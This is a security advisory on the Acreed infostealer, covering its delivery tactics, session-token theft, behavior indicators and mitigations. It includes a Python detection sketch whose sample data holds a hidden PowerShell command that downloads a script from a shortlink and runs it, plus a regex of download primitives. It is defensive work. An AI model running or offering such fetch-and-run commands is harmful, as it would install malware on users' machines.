Acreed Infostealer Becomes Top Credential Theft Tool After Lumma Takedown

Threat Group: Unknown (Emerging actors on Russian Market)
Threat Type: Infostealer Malware
Exploited Vulnerabilities: Phishing, Malvertising, SEO Poisoning, ClickFix social engineering, AI-generated deception, DLL side-loading
Malware Used: Acreed Infostealer
Threat Score: 🔴 High (7.8/10) – Rapid adoption, advanced session token theft, and critical infrastructure targeting
Last Threat Observation: June 4, 2025
Overview
Acreed Infostealer has rapidly emerged as one of the most dangerous credential-theft malware strains in the post-Lumma landscape. First detected on February 10, 2025, it gained momentum as a substitute for LummaC2 following that malware's takedown. Acreed is optimized for credential harvesting and specifically targets active session tokens from major cloud platforms, including Microsoft 365, Google, AWS, Azure, and Salesforce; replaying a stolen token lets an attacker bypass MFA, because the MFA challenge was already satisfied when the session was created. The malware packages stolen data as structured JSON for efficient monetization and resale through marketplaces such as the Russian Market. This advisory incorporates late May–early June intelligence and describes Acreed's capabilities, its appeal within the cybercrime supply chain, and why it is increasingly tied to ransomware and advanced persistent threat (APT) activity.
Key Details
Delivery Method:
- Phishing emails using lure documents and fake login pages
- Malicious software disguised as cracked apps, game mods, or utilities
- ClickFix techniques (malicious PowerShell via deceptive CAPTCHAs)
- AI-generated TikTok and YouTube videos directing users to execute payloads manually
- SEO poisoning and blog spam to surface malicious links in top search results
Target:
- Windows systems in both consumer and enterprise environments
- Corporate credentials (SaaS/SSO) and developer platforms
- Hybrid work endpoints (personal devices with corporate access)
Functions:
- Credential theft from browsers (Chrome, Edge, Firefox)
- Cloud token/session hijacking (Microsoft 365, GCP, AWS, Salesforce)
- Credential capture from VPN, chat, FTP, terminal, and remote tools
- Screenshot capture, clipboard scraping, and text file harvesting
- Collection of system info (HWID, IP, software, admin status)
Obfuscation:
- JSON logs for credentials and host data
- DLL side-loading with trusted binaries
- Self-deleting payloads, script obfuscation, and sandbox evasion
- Use of legitimate cloud services for intermediary C2 (e.g., Google Docs, Steam)
Attack Vectors
Acreed distribution leverages a diverse array of vectors:
- Phishing Campaigns: Classic attachments or embedded fake CAPTCHA overlays tricking users into executing scripts
- ClickFix Delivery: JavaScript-based deception pages that prompt the user to run a PowerShell download command themselves; the page contains no clickable links, only user input
- AI-Generated Videos: Social media lures in which TikTok-style videos walk viewers through command-line instructions, using viral audio to lend credibility (seen in campaigns that exceeded 500,000 views)
- Malvertising/SEO Poisoning: Posts disguised as free downloads, developer Q&A responses, or forum threads, often ranking high in search engines
- DLL side-loading: Dropped alongside legitimate EXEs such as installers or admin tools, evading detection by masquerading as part of a trusted application
These vectors reflect a shift toward user-enabled compromise that relies on social engineering rather than exploit kits, and they require a higher level of behavioral detection.
Known Indicators of Compromise (IoCs)
Hashes and Samples: No static Acreed hashes or binaries publicly disclosed as of June 4, 2025.
Known Behavior Patterns:
- PowerShell executions downloading files from suspicious shortlink services
- Creation of JSON-formatted logs in temp or user profile directories
- Network beacons or uploads to known services like Google Docs, telegra.ph, or GitHub
- Fileless activity triggered by clipboard or browser events
Anomalous Outbound Connections:
- Sudden bursts of traffic to encrypted Google services, Steam CDN, or Telegram APIs
- Session hijack attempts involving reuse of cloud tokens from alternate geolocations
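As an added example, not part of the original advisory, the following Python sketch shows how two of the behavior patterns listed above (PowerShell downloads from shortlink services, and cloud session tokens reused from different geolocations within a short window) can be checked against endpoint and sign-in telemetry. The shortlink domain list, the 30-minute window, and the sample command lines and sign-in records are constructed assumptions for illustration, not Acreed indicators.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed shortlink hosts to watch; tune to your own threat-intel feed.
SHORTLINK_DOMAINS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}
# Download primitives typical of ClickFix-style PowerShell one-liners.
DOWNLOAD_PATTERN = re.compile(
    r"\b(invoke-webrequest|iwr|irm|invoke-restmethod|downloadstring|"
    r"downloadfile|curl|wget)\b", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

def flag_powershell_download(cmdline):
    """Return the shortlink host if a PowerShell command line fetches from one, else None."""
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    if not DOWNLOAD_PATTERN.search(cmdline):
        return None
    for host in URL_PATTERN.findall(cmdline):
        if host.lower() in SHORTLINK_DOMAINS:
            return host.lower()
    return None

def flag_token_geo_reuse(signins, window=timedelta(minutes=30)):
    """Return session ids seen from two different countries within `window`.
    signins: iterable of (timestamp, session_id, country) from cloud sign-in logs."""
    seen = defaultdict(list)
    hits = set()
    for ts, sid, country in sorted(signins):
        for prev_ts, prev_country in seen[sid]:
            if prev_country != country and ts - prev_ts <= window:
                hits.add(sid)
        seen[sid].append((ts, country))
    return sorted(hits)

# Constructed sample telemetry (not real IoCs).
SAMPLE_CMDLINES = [
    'powershell -w hidden -c "iwr https://bit.ly/xyz -OutFile $env:TEMP\\u.ps1; & $env:TEMP\\u.ps1"',
    "powershell -Command Get-ChildItem C:\\Users",
    "cmd.exe /c dir",
]
SAMPLE_SIGNINS = [
    (datetime(2025, 6, 4, 9, 0), "sess-A", "DE"),
    (datetime(2025, 6, 4, 9, 12), "sess-A", "BR"),  # same token, new country, 12 min later
    (datetime(2025, 6, 4, 9, 0), "sess-B", "DE"),
    (datetime(2025, 6, 4, 15, 0), "sess-B", "FR"),  # 6 h later: outside window, not flagged
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(flag_powershell_download(c), "<-", c[:50])
    print("token reuse:", flag_token_geo_reuse(SAMPLE_SIGNINS))
```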
Notable Distinction:
- Acreed is not ACRStealer: these are separate malware families, and confusing the two could lead to incorrect attribution. Acreed does not rely on the same Dead Drop Resolver model.
Mitigation and Prevention
User Awareness:
- Train users on non-traditional phishing such as video-based instructions and copy-paste malware
- Reinforce safe browsing and application installation behavior
Email & Web Filtering:
- Deploy sandboxed email gateways to detect CAPTCHAs, JS redirects, and macro-enabled documents
- Filter inbound URLs using threat intelligence feeds and DNS-layer protection
Endpoint Protection (EDR):
- Monitor for script execution, JSON log generation, session token access, and DLL side-loading attempts
- Flag and contain devices communicating with unusual legitimate services
Identity Management:
- Enforce phishing-resistant MFA (FIDO2/WebAuthn)
- Shorten session durations for sensitive applications
- Monitor and revoke anomalous logins using active session tokens
Credential Hygiene:
- Ban browser-based password storage on corporate machines
- Mandate use of enterprise password managers with central auditing
Dark Web Monitoring:
- Continuously scan marketplaces like Russian Market for log sales tied to corporate emails or domain credentials
- Prepare rapid credential rotation and incident response procedures
Network Segmentation and Least Privilege:
- Prevent lateral movement by segmenting departments and limiting local admin access
- Disable command-line tools like PowerShell and WScript where unnecessary
Risk Assessment
Threat Score: 🔴 High (7.8/10)
Acreed is not just a credential stealer; it is a full-fledged access broker. It supports a growing criminal ecosystem and provides operational agility to ransomware affiliates and nation-state APTs. It bypasses MFA via session theft and uses dynamic, non-signature-based communication strategies that evade traditional security controls. Its popularity on criminal forums and its marketplace presence indicate long-term sustainability.
Conclusion
Acreed Infostealer exemplifies the new generation of highly adaptive, marketplace-ready infostealers that feed ransomware operators, initial access brokers, and advanced espionage campaigns. Organizations must now assume that a single compromised endpoint can cascade into domain-wide compromise. Traditional endpoint protection and phishing awareness must evolve into continuous behavioral monitoring, identity context validation, and dark web intelligence integration.
Organizations are urged to:
- Detect token theft and behavioral anomalies post-authentication
- Stop relying solely on static malware signatures or MFA
- Combine EDR, adaptive IAM, and credential hygiene with social engineering-resistant education
Defending against Acreed means disrupting not just the malware, but the economic chain that empowers it.
Sources
- Infosecurity Magazine – "Acreed Emerges as Dominant Infostealer Threat Following Lumma Takedown" – https://www.infosecurity-magazine.com/news/acreed-dominant-infostealer-lumma/
- Webz.io – "Acreed Infostealer – Everything We Know So Far" – https://webz.io/dwp/acreed-infostealer-everything-we-know-so-far/
- BleepingComputer – "Russian Market Credential Theft Surge" – https://www.bleepingcomputer.com/news/security/russian-market-emerges-as-a-go-to-shop-for-stolen-credentials/